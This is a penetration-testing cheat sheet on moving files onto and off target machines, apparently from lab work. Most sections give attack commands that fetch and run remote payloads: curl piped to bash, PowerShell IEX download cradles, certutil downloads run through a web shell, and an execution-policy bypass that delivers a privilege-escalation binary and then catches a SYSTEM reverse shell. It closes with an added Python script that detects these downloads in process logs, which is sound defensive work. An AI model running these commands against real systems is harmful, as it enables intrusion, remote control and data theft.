# Transfer Files

## More

* <https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/>
* <https://gist.github.com/willurd/5720255>

## Curl

```
vim script.py
python -m SimpleHTTPServer 80                     ..share
curl http://10.x.x.x:80/script.py -o /opt/tmp.py  ..d/l overwrite
curl $MyIP:80/LinEnum.sh | bash                   ..d/l execute (linux)

curl --user david:Nowonly4me http://10.x.x.x/~david/
curl --user david:Nowonly4me --negotiate http://10.x.x.x/~david/
```

## smbserver

* Share from Linux SMB to Windows

```
locate smbserver.py                             ..find
cd /usr/share/doc/python3-impacket/examples     ..prep
sudo python3 ./smbserver.py share /tmp          ..share
impacket-smbserver share `pwd`                  ..another method
smbclient -L 10.x.x.x --no-pass                 ..test

net view \\10.x.x.x                             ..windows command
net use z: \\10.x.x.x\pub                       ..map a drive
copy "Oracle Issue.txt" z:                      ..copy file
dir \\10.x.x.x\share                            ..windows list directory
copy \\10.x.x.x\share\app C:\Windows\Temp\      ..windows copy
\\10.x.x.x\share\reverse.exe                    ..run
```

## Windows Share

* Linux: Copy to Windows Share

```
smbclient //10.x.x.x/sharename -U domain/username
```

* Linux: Mount Windows Share

```
mkdir /mnt/smbshare
sudo mount -t cifs //serverfs/c$ -o username=bob,password=xyz /mnt/smbshare
cd /mnt/smbshare
```

* Windows: Copy to Windows Share

```
copy exploit.exe \\10.x.x.x\users\bob
```

## HTTP Server One Liners

```
> python2 -m SimpleHTTPServer 80
> python3 -m http.server 80

> php -S localhost:80 -t evil/

> while true; do nc -l 80 < test.html; done

> ncat -k -l -p 80 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/evil.html"

> perl -MIO::All -e 'io(":80")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'

> ruby -run -e httpd . -p 80

From inetd.conf:
> 80 stream tcp nowait nobody cat cat /somefile
... where /somefile has the HTTP response line, headers and body
```

## Powershell

* [PowershellCheatsheet](/07-win-privesc/powershell.md)
* Share with Linux: python3 -m http.server
* Download with Windows PowerShell

```
----------------------
powershell.exe "(New-Object System.Net.WebClient).Downloadfile('http://$MyIP:8000/myfile','myfile')"

----------------------
echo IEX(New-Object Net.WebClient).DownloadString('http://<ip>:<port>/Sherlock.ps1') | powershell -noprofile

----------------------
echo $WebClient = New-Object System.Net.WebClient > wget.ps1
echo $WebClient.DownloadFile($Args[0],$Args[1]) >>  wget.ps1
powershell -ExecutionPolicy Bypass -File wget.ps1 http://$MyIP:8000/file.exe file.exe

----------------------
http://10.x.x.x/ippsec.php?fexec=systeminfo
http://10.x.x.x/ippsec.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString('http://10.x.x.x:8000/PowerUp.ps1')|powershell -noprofile
```

## Powershell Advanced

* Can't execute the payload?
* Powershell ByPass Execution Policy
* Example: [ChimichurriWindowsPrivEsc](/07-win-privesc/win-privesc.md#chimichurri)

```
cd C:\ColdFusion8\  or:
cd C:\Windows\Temp

echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Chimichurri.exe 10.10.14.x 5555
nc -nvlp 5555
connected ..system!!
```

## smb setup issues

* Run smbserver.py from Linux
* Now Windows can share back to Linux
* [https://blog.ropnop.com/transferring-files-from-kali-to-windows/](https://blog.ropnop.com/transferring-files-from-kali-to-windows/#setting-up-the-server)
* <https://github.com/SecureAuthCorp/impacket>
* REF: [ChurrascoWindowsPrivEsc](/07-win-privesc/win-privesc.md#token-kidnapping-churrasco)

```
------------------------
Install Attempts:

python --version
python3 --version
apt-get install python3.6-dev libmysqlclient-dev
pip install --upgrade setuptools --user python
sudo apt-get install libpcap-dev libpq-dev
pip3 install --upgrade setuptools --user python
cd /opt/impacket
sudo -i
git clone https://github.com/SecureAuthCorp/impacket.git
pip install .
pip3 install .
python3 -m pip install -U pip
python3 -m pip install -U setuptools
pip install impacket
pip3 install impacket
```

## smb setup impacket python2

```
Install the old pip (unofficial way)
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
python get-pip.py

PATH=/home/kali/.local/bin:$PATH     ..update PATH manually

pip --version                        ..confirm v2 not v3
pip 20.3.4 from /home/kali/.local/lib/python2.7/site-packages/pip (python 2.7)

pip install --upgrade setuptools
pip install impacket
```

## smb optional

* Example: [DrupalPhpVuln](/04-webapps/drupal.md#serialization-vulnerability-41564-php)

```
> impacket-smbserver share myfolder
http://10.x.x.x/ippsec.php?fexec=\\10.x.x.x\share\privesc.exe whoami
```

## nc

```
Easy:

nc -lp 4444 > out.file
nc -w 3 DestIP 4444 < out.file


Faster:

nc -lp 4444 | uncompress -c | tar xvfp -
tar cfp - /some/dir | compress -c | nc -w 3 DestIP 4444


Whole Hard Drive:

dd if=/dev/hda3 | gzip -9 | nc -l 3333
nc DestIP 3333 | pv -b > hdImage.img.gz
```

## updog

* Looks like an interesting option if you need SSL
* <https://github.com/sc0tfree/updog>
* Default port 9090

```
updog
updog -p 4444 --ssl
updog -d /tmp --password mypax
```

## ftp

* anonymous, writable, port 2121
* <https://pythonhosted.org/pyftpdlib/faqs.html>

```
linux:
pip install pyftpdlib
python -m pyftpdlib -w
python3 -m pyftpdlib -p 21 -u mike -P paxx
 
windows:
ftp
open $MyIP
user mike passwurd
passive
put localfilename remotefilename
bye

ftp -n < ftpcommands.txt   ..optional
```

## Permission Trouble

* You may have a permissions problem
* Save and execute from the Temp folder!

```
cd C:\Windows\Temp\
copy \\10.x.x.x\share\myapp.exe .
myapp.exe
```

## certutil

* You can download files on Windows with this tool
* REF: bountyHTB

```
rs.Exec("certutil -urlcache -split -f http://10.x.x.x/agent.exe C:\\users\\public\\agent.exe")
rs.Exec("cmd /c C:\users\public\agent.exe")   ..execute
http://10.x.x.x/UploadedFiles/web.config      ..execute
```
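
Defender-side view of the Windows download commands in the Powershell and certutil sections: an added example (not part of the original page) that flags them in process command-line logs. Rule names and sample log lines are constructed; 192.0.2.10 is a documentation address.

```python
import re

# Rule names are labels invented for this example; each pattern targets one
# download technique from the Powershell / certutil sections above.
RULES = [
    ("certutil_urlcache",
     re.compile(r"\bcertutil(?:\.exe)?\b.*[-/]urlcache\b.*https?://", re.I)),
    ("webclient_download",
     re.compile(r"Net\.WebClient\b.*\.Download(?:File|String)\s*\(", re.I)),
    ("iex_download_string",
     re.compile(r"\b(?:IEX|Invoke-Expression)\b.*DownloadString", re.I)),
    # -ExecutionPolicy can be abbreviated (-ep, -exec), so match the prefix.
    ("execpolicy_bypass",
     re.compile(r"\bpowershell(?:\.exe)?\b.*\s-e[xp]\w*\s+bypass\b", re.I)),
    # Script or binary referenced on a share addressed by raw IP.
    ("unc_ip_binary",
     re.compile(r'\\\\\d{1,3}(?:\.\d{1,3}){3}\\[^\s"]+\.(?:exe|ps1|bat)\b', re.I)),
]

# Constructed process-creation command lines (Sysmon ID 1 / 4688 style).
SAMPLES = [
    r"certutil -urlcache -split -f http://192.0.2.10/agent.exe C:\users\public\agent.exe",
    r"powershell.exe -c (New-Object System.Net.WebClient).DownloadFile('http://192.0.2.10:8000/myfile','myfile')",
    r"cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://192.0.2.10:8000/Sherlock.ps1') | powershell -noprofile",
    r"powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1",
    r"cmd.exe /c \\192.0.2.10\share\reverse.exe",
    r"certutil -verifystore My",                              # benign
    r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",  # benign
]

def classify(cmdline):
    """Return the sorted names of every rule that matches one command line."""
    return sorted(name for name, rx in RULES if rx.search(cmdline))

def scan(cmdlines):
    """Map each flagged command line to its rule hits; clean lines are omitted."""
    return {c: hits for c in cmdlines if (hits := classify(c))}

if __name__ == "__main__":
    for cmd, hits in scan(SAMPLES).items():
        print(f"{','.join(hits):42} {cmd}")
```

With the `echo ... | powershell -noprofile` form, the powershell.exe command line itself holds only `-noprofile`, so these rules only fire if the parent cmd.exe line is logged. PowerShell script block logging (event 4104) records the script text in that case.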

